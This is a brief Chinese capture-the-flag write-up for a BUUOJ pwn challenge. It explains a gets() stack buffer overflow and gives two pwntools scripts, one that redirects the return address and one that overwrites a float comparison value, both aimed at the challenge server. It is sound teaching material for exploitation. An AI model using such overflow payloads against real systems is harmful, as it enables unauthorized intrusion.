前戏--------checksec,运行查看

进入就可以发现这段代码

很浅显易懂

我们要得到的后面是

这里

我们要利用的漏洞是

get函数

0x30大小

加上8

exp:

from pwn import *
ghust = remote("node5.buuoj.cn",28777)
addr = 0x4006BE
payload = b'A' * 0x30 +b'B'*0x8+ p64(addr)
ghust.sendline(payload)
ghust.interactive()

这段代码,我的ubutu22用不了

还是下了18才行,不知道为什么

方法二:

这道题其实我们让V2满足条件也行

11.28125

必须要是在内存中的表示

回到汇编

找到jnz判断

看见上面的cs了吗?

双击就行

记一下这个413800,因为这里是对比dword,已经取了一次地址了,我们就拿他的赋值

from pwn import *
ghust = remote("node5.buuoj.cn",28771)
addr = 0x41348000
payload = b'A' * (0x30-0x4) + p64(addr)
ghust.sendline(payload)
ghust.interactive()

下班!